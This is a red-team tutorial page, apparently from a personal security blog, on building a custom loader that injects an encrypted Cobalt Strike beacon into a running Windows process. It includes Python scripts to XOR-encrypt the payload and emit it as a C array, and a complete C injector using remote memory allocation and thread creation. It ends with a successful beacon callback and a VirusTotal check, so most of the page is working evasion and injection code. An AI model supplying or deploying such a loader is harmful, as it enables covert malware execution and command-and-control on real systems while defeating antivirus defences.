😴
gatari
  • πŸ‘‹root@gatari
  • πŸ”«Active Directory (Boxes)
    • Access Walkthrough
  • πŸ”΄Red Team
    • What is Windows Defender?
    • Post-Exploitation on Disk
    • Command and Control (C2)
      • Signatured by Default
      • Bring Your Own Loader
    • Creating A C2 Framework
      • Prototyping
      • Interfaces
      • Endpoints & Listeners
  • 🚩CTF Writeups
    • 🀑GCTF 2022
      • πŸͺ„ret2secret
      • 🀑login
    • 🀑LNC 2023
      • πŸ‘½Alien Portal
    • 🀑Gryphons Mini-CTF 2023
      • πŸ‘¨β€πŸ’»Web
        • πŸ₯ΆChill
        • πŸͺ Leaked Login
        • πŸͺCookie Monster
        • ✈️Traveller
        • 🀯Headers
      • ☠️Pwn
        • 🐱Netcat
        • πŸ‘¨β€πŸ’»Login
        • πŸ‘©β€πŸ’»Login 2
        • πŸ§‘β€πŸ’»Login 3
      • βͺReverse
        • πŸ”«Valorant Aimbot
        • 🀣WannaLaugh
        • πŸͺšHacksaw
        • 🀫Secret
        • ❓Command & ...POST?
        • πŸ’€Bruh
      • 🧠Sanity Check
        • πŸ‡¨πŸ‡³ζ—©δΈŠε₯½δΈ­ε›½
        • πŸͺ‘Needle in a Haystack(s)
      • πŸ“€Crypto
        • 🀦Ascee? Asskey?
  • πŸ“˜Reviews
    • 😭CRTO - Certified Red Team Operator
Powered by GitBook
On this page
  • Shellcode injection?
  • Objective
  • Encrypting Shellcode
  • Saving Shellcode to C Format
  • The Loader
  • Testing the Loader
  • Beacon Callback
  • OPSEC
  • Virus Total?
  1. Red Team
  2. Command and Control (C2)

Bring Your Own Loader

Process injection? What's that, is it painful?

PreviousSignatured by DefaultNextCreating A C2 Framework

Last updated 1 year ago

Shellcode injection?

Shellcode injection is a popular technique used by malware developers to inject code, known as shellcode, into a running process.

Objective

The goal is to create a custom injector/dropper that loads cobaltstrike beacon into another thread, without tipping off Windows Defender.

Encrypting Shellcode

Before creating the loader, we need to obtain our shellcode from CS. Fortunately for us, cobalt strike is able to generate staged shellcode and output in a raw format.

However, this raw format is also heavily signatured by AV- so we will need to encrypt it before we can put it in our loader.

This is a quick Python utility to XOR encrypt the shellcode:

def xor(file_path, key):
    try:
        with open(file_path, 'rb') as file:
            data = file.read()
        encrypted_data = bytearray(data)
        for i in range(len(encrypted_data)):
            encrypted_data[i] ^= key[i % len(key)]

        return encrypted_data

    except Exception as e:
        return f"An error occurred: {e}"

encrypted_payload = xor(file_path="./original/payload_x64.bin", key=b"\x41\x41\x41\x41")
with open("./encrypted/encrypted_x64.bin", 'wb') as file:
    file.write(encrypted_payload)

And a sanity check, just incase something went wrong.

def xor(file_path, key):
    try:
        with open(file_path, "rb") as f:
            data = f.read()
        encrypted_data = bytearray(data)
        for i in range(len(encrypted_data)):
            encrypted_data[i] ^= key[i % len(key)]

        return encrypted_data

    except Exception as e:
        return f"An error occurred: {e}"


with open("./original/payload_x64.bin", "rb") as f:
    before = f.read()[0:0x10]

with open("./encrypted/encrypted_x64.bin", "rb") as f:
    after = f.read()[0:0x10]

dec = bytes(xor(file_path="./encrypted/encrypted_x64.bin", key=b"\x41\x41\x41\x41"))[0:0x10]

print(f"[*] Before: {before}")
print(f"[*] After: {after}")

print(f"[*] Decrypted: {dec}")

print(f"[*] OK? {before == dec}")
[*] Before: b'MZARUH\x89\xe5H\x81\xec \x00\x00\x00H'
[*] After: b'\x0c\x1b\x00\x13\x14\t\xc8\xa4\t\xc0\xadaAAA\t'
[*] Decrypted: b'MZARUH\x89\xe5H\x81\xec \x00\x00\x00H'     
[*] OK? True

And, we're good to go!

Saving Shellcode to C Format

Another quick Python utility I wrote for another project a while back exe2c_sh which converts EXEs into an injectable C format using Donut.

def to_code(file_path: str) -> str:
    with open(file_path, 'rb') as file:
        bytesread = file.read()
    bytes_array = [f"0x{byte:02X}" for byte in bytesread]
    bytes_string_final = ', '.join(bytes_array)
    ps_shellcode = f"unsigned char shellcode[] = {{ {bytes_string_final} }};"
    return ps_shellcode

formatted = to_code("./encrypted/encrypted_x64.bin")
with open("./encrypted/encrypted_x64.c", "w") as f:
    f.write(formatted)

The Loader

The loader will use the standard method of shellcode injection into a remote process using OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.

Step 1: Load shellcode into memory

Shellcode.c
unsigned char shellcode[] = { 0x0C, 0x1B, 0x00, 0x13, 0x14, 0x09, 0xC8, 0xA4, 0x09, 0xC0, 0xAD, 0x61, 0x41, 0x41, 0x41, 0x09, 0xCC, 0x5C, 0xAB, 0xBE, 0xBE, 0xBE, 0x09, 0xC8, 0x9E, 0x09, 0xC0, 0x82, 0x95, 0xC9, 0x40, ... }
Shellcode.h
#ifndef SHELLCODE_H
#define SHELLCODE_H

extern unsigned char shellcode[];

#endif

These are initialized at compilation, remember the shellcode is encrypted**

  1. Decrypt shellcode at runtime

Main.c
void xor (unsigned char* shellcode, size_t shellcode_size, unsigned char* key, size_t key_len) {
	for (unsigned int i = 0; i < shellcode_size; i++) {
		shellcode[i] ^= key[i % key_len];
	}
}

int main( int argc, char* argv[] ) {
	size_t shellcode_size = 307200;
	unsigned char key[] = { 0x41, 0x41, 0x41, 0x41 };

	xor (shellcode, shellcode_size, key, sizeof( key ));
	
}

The XOR function takes in a pointer to the shellcode

  1. Find process ID of injected process (for demo purposes, notepad.exe)

Main.c
DWORD Find( const char* processName ) {
	DWORD aProcesses[1024], cbNeeded, cProcesses;
	unsigned int i;

	if (!EnumProcesses( aProcesses, sizeof( aProcesses ), &cbNeeded )) {
		return 0;
	}

	cProcesses = cbNeeded / sizeof( DWORD );

	for (i = 0; i < cProcesses; i++) {
		if (aProcesses[i] != 0) {
			HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i] );

			if (hProcess != NULL) {
				HMODULE hMod;
				DWORD cbNeeded;

				if (EnumProcessModules( hProcess, &hMod, sizeof( hMod ), &cbNeeded )) {
					char szProcessName[MAX_PATH];

					if (GetModuleBaseNameA( hProcess, hMod, szProcessName, sizeof( szProcessName ) / sizeof( char ) )) {
						if (strcmp( szProcessName, processName ) == 0) {
							CloseHandle( hProcess );
							return aProcesses[i];
						}
					}
				}

				CloseHandle( hProcess );
			}
		}
	}

	return 0;
}

int main( int argc, char* argv[] ) {
	size_t shellcode_size = 307200;
	unsigned char key[] = { 0x41, 0x41, 0x41, 0x41 };

	xor (shellcode, shellcode_size, key, sizeof( key ));

	printf( "[*] First 10 bytes: %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x\n", shellcode[0], shellcode[1], shellcode[2], shellcode[3], shellcode[4], shellcode[5], shellcode[6], shellcode[7], shellcode[8], shellcode[9] );

	const char* processName = "notepad.exe";
	int PID = Find( processName );
	if (PID == 0) {
		printf( "[!] Failed to find process: %s\n", processName );
		return 1;
	}
	printf( "[*] PID: %d\n", PID );
}

Returns the process ID of the target process

  1. Open a handle to the target process

Main.c
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID );
if (hProcess == NULL) {
	printf( "[!] Failed to open process\n" );
	return;
}

  1. Allocate memory to the process (see the byte size of the file, too small allocation will cause an allocation out of memory bounds error)

Main.c
LPVOID exec = VirtualAllocEx( hProcess, NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
if (exec == NULL) {
	printf( "[!] Failed to allocate memory\n" );
	return;
}

⚠️ Note: the PAGE_EXECUTE_READWRITE access, consider setting this to a lower privilege and changing it later. See: Enumerating RWX Protected Memory Regions for Code Injection

  1. Write your shellcode to that memory

if (!WriteProcessMemory( hProcess, exec, shellcode, shellcode_size, NULL )) {
	printf( "[!] Failed to write memory\n" );
	return;
}

  1. Wait for thread to safely exit, so your beacon doesn't die early

Main.c
WaitForSingleObject( hThread, INFINITE );
CloseHandle( hThread );
CloseHandle( hProcess );

Testing the Loader

Main.c
#include <windows.h>
#include "shellcode.h"
#include <stdio.h>
#include <psapi.h>
#include <string.h>

void xor (unsigned char* shellcode, size_t shellcode_size, unsigned char* key, size_t key_len) {
	for (unsigned int i = 0; i < shellcode_size; i++) {
		shellcode[i] ^= key[i % key_len];
	}
}

DWORD Find( const char* processName ) {
	DWORD aProcesses[1024], cbNeeded, cProcesses;
	unsigned int i;

	if (!EnumProcesses( aProcesses, sizeof( aProcesses ), &cbNeeded )) {
		return 0;
	}

	cProcesses = cbNeeded / sizeof( DWORD );

	for (i = 0; i < cProcesses; i++) {
		if (aProcesses[i] != 0) {
			HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i] );

			if (hProcess != NULL) {
				HMODULE hMod;
				DWORD cbNeeded;

				if (EnumProcessModules( hProcess, &hMod, sizeof( hMod ), &cbNeeded )) {
					char szProcessName[MAX_PATH];

					if (GetModuleBaseNameA( hProcess, hMod, szProcessName, sizeof( szProcessName ) / sizeof( char ) )) {
						if (strcmp( szProcessName, processName ) == 0) {
							CloseHandle( hProcess );
							return aProcesses[i];
						}
					}
				}

				CloseHandle( hProcess );
			}
		}
	}

	return 0;
}

void Inject( int PID, unsigned char* shellcode, size_t shellcode_size ) {
	printf( "[*] Opening handle to process: %d\n", PID );
	HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID );
	if (hProcess == NULL) {
		printf( "[!] Failed to open process\n" );
		return;
	}
	printf( "[*] Allocating memory\n" );
	LPVOID exec = VirtualAllocEx( hProcess, NULL, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
	if (exec == NULL) {
		printf( "[!] Failed to allocate memory\n" );
		return;
	}
	printf( "[*] Writing memory\n" );
	if (!WriteProcessMemory( hProcess, exec, shellcode, shellcode_size, NULL )) {
		printf( "[!] Failed to write memory\n" );
		return;
	}
	printf( "[*] Creating thread\n" );
	HANDLE hThread = CreateRemoteThread( hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec, NULL, 0, NULL );
	if (hThread == NULL) {
		printf( "[!] Failed to create thread\n" );
		return;
	}
	printf( "[*] Waiting for thread to exit\n" );
	WaitForSingleObject( hThread, INFINITE );
	CloseHandle( hThread );
	CloseHandle( hProcess );
}

int main( int argc, char* argv[] ) {
	size_t shellcode_size = 307200;
	unsigned char key[] = { 0x41, 0x41, 0x41, 0x41 };

	xor (shellcode, shellcode_size, key, sizeof( key ));

	printf( "[*] First 10 bytes: %02x %02x %02x %02x %02x %02x %02x %02x %02x %02x\n", shellcode[0], shellcode[1], shellcode[2], shellcode[3], shellcode[4], shellcode[5], shellcode[6], shellcode[7], shellcode[8], shellcode[9] );

	const char* processName = "notepad.exe";
	int PID = Find( processName );
	if (PID == 0) {
		printf( "[!] Failed to find process: %s\n", processName );
		return 1;
	}
	printf( "[*] PID: %d\n", PID );

	Inject( PID, shellcode, shellcode_size );

	return 0;
}

⚠️ When compiling the binary, ALWAYS use Release mode to strip the binary from symbols and ensure that you compile to the right architecture! x64/x86

In my case, I will compile it on MSVC to x64.

Beacon Callback

And, we get our successful beacon callback!

OPSEC

⚠️ Note the thread start address at: 0x0 (TID: 17496)

This is how our beacon thread looks like in the injected process.

⚠️ Note the Private: Commit RWX allocated memory

Virus Total?

Let's see how VT sees our implant

Beacon successfully dropped to disk!

πŸ”΄
βœ